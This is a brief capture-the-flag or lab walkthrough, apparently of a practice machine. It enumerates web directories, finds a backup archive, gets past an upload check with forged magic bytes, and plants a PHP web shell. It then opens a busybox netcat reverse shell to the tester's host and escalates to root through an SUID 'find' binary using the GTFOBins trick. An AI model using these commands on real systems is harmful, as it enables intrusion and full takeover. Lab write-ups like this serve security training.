80

Running feroxbuster:

feroxbuster -u http://192.168.155.33/ -C 404,400 -A --wordlist '/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt' -B --auto-tune

We discover a backup.zip.

We can see the code for the web application:

It is a POST request to upload.php

Now to reverse this:

<?php
$magicbytes = strtoupper(substr(bin2hex('MZ'),0,4));
print_r($magicbytes)
?>

Running it we get the magic byte we need:

We can upload a shell this way.

Now we can test it: http://192.168.155.33/upload/shell.php?cmd=whoami

Now to get a shell:

http://192.168.155.33/upload/shell.php?cmd=busybox%20nc%20192.168.45.233%2080%20-e%20bash

Start a listener:

sudo rlwrap -nlvp 80

We find an unknown SUID binary using linpeas:

This is find binary.

Using the gtfobins for find:

/opt/fileS . -exec /bin/sh -p \; -quit